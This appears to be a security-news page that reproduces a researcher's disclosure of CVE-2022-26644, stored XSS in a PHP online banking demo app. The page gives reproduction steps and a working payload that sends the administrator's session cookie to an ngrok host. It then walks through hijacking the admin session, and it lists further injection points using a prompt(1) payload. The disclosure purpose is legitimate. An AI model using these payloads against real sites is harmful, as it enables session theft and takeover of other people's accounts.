Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26644: CVE/CVE-2022-26644 at main · erik-451/CVE

Online Banking System Protect v1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via parameters on user profile, system_info and accounts management.

CVE
#xss#vulnerability#web#git#java

Tittle: Online Banking System Stored XSS****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0

  • Description: A XSS issue in OBS v1.0 allows remote attackers to inject JavaScript in the description parameters. XSS to Privilege Escalation
  • Client can craft a malicious payload, when the administrator goes to “account managment menu” the payload will be executed and the administrator cookies will be sent to the attacker server.

Steps to reproduce:

  • 1- Go to http://localhost/banking/client/?page=user
  • 2- Edite your profile name and paste the payload
  • 3- Using a ngrok http server to get the request with the administrator cookie

Payload used to steal the session Cookie:

<script>var i=new Image;i.src=`https://2c32-81-9-194-204.ngrok.io/?c=${document.cookie}`;</script>

ngrokclient

****Admin Session****

The administrator goes to the manage accounts menu and will execute the payload in background. Now we have the admin cookie on the request

admincookie

Edit our cookie with the new admin cookie, reload admin page and now we are administrators.

loginasadmin

Other XSS

Payload used: <img src="x" onerror=prompt(1)>

Announcements Tittle

  • 1- Go to http://web.com/admin/?page=announcements/manage_announcement
  • 2- Create or edite an announcement and paste the payload

XSSannouncement

XSSannouncement2

Accounts Name

  • 1- Go to http://web.com/admin/?page=accounts/manage_account
  • 2- Create or edite an accounts and paste the payload, client account will execute the payload on his session.

System Info Name

  • 1- Go to http://web.com/admin/?page=system_info
  • 2- Edite the app/system info and paste the payload
  • 3- This is the configuration of the app, all clients will see the tittle on the app, the XSS will be executed.

XSSsysinfo

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907